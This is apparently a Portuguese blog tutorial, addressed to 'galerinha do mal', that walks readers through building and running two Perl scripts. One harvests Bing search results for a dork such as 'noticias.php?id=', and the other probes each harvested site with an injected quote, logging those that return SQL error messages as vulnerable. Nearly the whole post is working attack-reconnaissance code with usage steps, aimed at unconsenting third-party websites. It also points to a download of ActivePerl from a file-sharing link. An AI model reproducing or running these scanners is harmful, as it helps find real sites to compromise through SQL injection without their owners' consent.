Fala ae galerinha do mal tudo bem ?kk
Hj vou estar ensinando a criar um scan que faz procuras por sites vulneraveis a SQL injection. Bom chega de papo e vamos la !
1° Passo baixe o programa ActivePerl-5.16.http://www.mediafire.com/download/wpvaa96vjcibsk1/ActivePerl-5.16.rar Para que possa rodar os arquivos !!!
2° Passo abra seu bloco de notas e cole este codigo :
#!/usr/bin/perl
#Coded: Brlo0ping
use LWP::UserAgent;
print "----|| Coded: Brlo0ping ||-----||Acc3ss ro0t:~# ----||\n";
print "Digite um dork: ex:(noticias.php?id=100)\n" ;
print "-->>";
$dork = <STDIN>;
chomp($dork);
for ($i = 0; $i < 1000; $i += 10) {
$b = LWP::UserAgent->new(agent => 'Mozilla/4.8 [en] (Windows NT 6.0; U)');
$b->timeout(30);
$b->env_proxy;
$c = $b->get('http://www.bing.com/search?q=' . $dork . '&first=' . $i . '&FORM=PERE')->content;
$check = index($c, 'sb_pagN');
while (1) {
$n = index($c, '<h3><a href="');
if ($n == -1) {
last;
}
$c = substr($c, $n + 13);
$s = substr($c, 0, index($c, '"'));
open (txt,">>lista.txt");
print txt $s,"\n";
close(txt);
}
if ($check == -1) {
last;
}
}
system("lista.txt");
exit;
........................ .................. e salve na sua area de trabalho como scan.pl
3° Passo: abra novamente seu bloco de notas e cole este codigo:
#!/usr/bin/perl
use LWP::UserAgent;
use HTTP::Request;
use LWP::Simple;
$sis="$^O";if ($sis eq linux){ $cmd="clear";} else { $cmd="cls"; }
system("$cmd");
if (!$ARGV[0]) {
$sis="$^O";if ($sis eq linux){ $cmd="clear";} else { $cmd="cls"; }
system("$cmd");
my @bannerzinho = (0,100..200);
my $variavelbanner = $bannerzinho[int rand @bannerzinho];
if ($variavelbanner % 2 == 0) {
&bannerUm();
exit;
}
else {
&bannerDois();
exit;
}
}
&bannerDois();
print q {
Scaneando WebSite...
};
open( SITE, "< $ARGV[0]" ) or die( "Nao foi possível abrir o arquivo: $!" );
our @array = <SITE>;
$numero = $#array;
for ($i = 0; $i <= $numero; $i++) {
$Dominio = "$array[$i]";
if($Dominio !~ /http:\/\//) { $Dominio = "http://$Dominio"; }
$cmd = "'";
$site = "$Dominio$cmd";
my $req=HTTP::Request->new(GET=>$site);
my $ua=LWP::UserAgent->new();
$ua->timeout(15);
my $resposta=$ua->request($req);
if($resposta->content =~ /You have an error in your SQL syntax/ ||
$resposta->content =~ /MySQL server version/ ||
$resposta->content =~ /Syntax error converting the nvarchar value/ ||
$resposta->content =~ /Unclosed/ ||
$resposta->content =~ /SQL Server error/ ||
$resposta->content =~ /JET/) {
print "\n \t $Dominio \n";
open (NOTEPAD, ">> Sites Vulneraveis.txt");
print NOTEPAD "$site\n";
close(NOTEPAD);
}
}
print q {
FIM DO SCANNEAMENTO !
};
sub bannerUm {
print q {
_______________________
< Hello !! Welcome !! >
-----------------------
\ ,__,
\ (oo)____
(__) )\
||--|| *
| | _) |
__ `__ \ _ \ __| _` | __| __ \ | _ \ | __|
| | | __/ | ( |\__ \ | | | ( | | |
_| _| _|\___|\__|\__,_|____/ .__/ _|\___/ _|\__|
_| Scanner v 1.0
Modo de uso: perl ScannerSQL.pl lista.txt
Scanner criado por: Loko Virtual
};
}
sub bannerDois {
print q {
_ _
_ | | (_)_
____ ____| |_ ____ ___ ____ | | ___ _| |_
| \ / _ ) _)/ _ |/___) _ \| |/ _ \| | _)
| | | ( (/ /| |_( ( | |___ | | | | | |_| | | |__
|_|_|_|\____)\___)_||_(___/| ||_/|_|\___/|_|\___)
|_| Scanner v 1.0
Modo de uso: perl ScannerSQL.pl lista.txt
Scanner criado por: Loko Virtual
};
}
........................ .................... e salve como sql.pl na sua area de trabalho!
4° Passo: Execute o scan.pl
Agora vc terá que colocar uma DORK EX: noticias.php?id=12 --->voce pode estar utilizando outros --->
Vamo la
Digite: noticias.php?id=12 e de enter
Vai começar a fazer um scan em todos os sites que tem esta DORK e ira criar um arquivo chamado "lista.txt" depois se você quiser parar é so apertar Ctrl + C.
5° Passo: agora abra seu CMD: pra quem não sabe aperte iniciar + R e ira abrir uma caixa de dialogo e digite cmd e de enter.
6° la vai estar na seguinte pasta -
C:\Users\USER>
Digite cd desktop e de enter e vai ficar assim:
C:\Users\USER\Desktop>
Digite sql.pl lista.txt e de enter /////e agora vai começar o scan e ira criar um arquivo txt chamado Sites Vulneraveis.
Pronto heuheuhe até que enfim , intao é isso espero que gostem e se ainda tem duvidas comenta ae em baixo que assim que eu tiver tempo eu respondo EEE tchauu!!!
Nenhum comentário:
Postar um comentário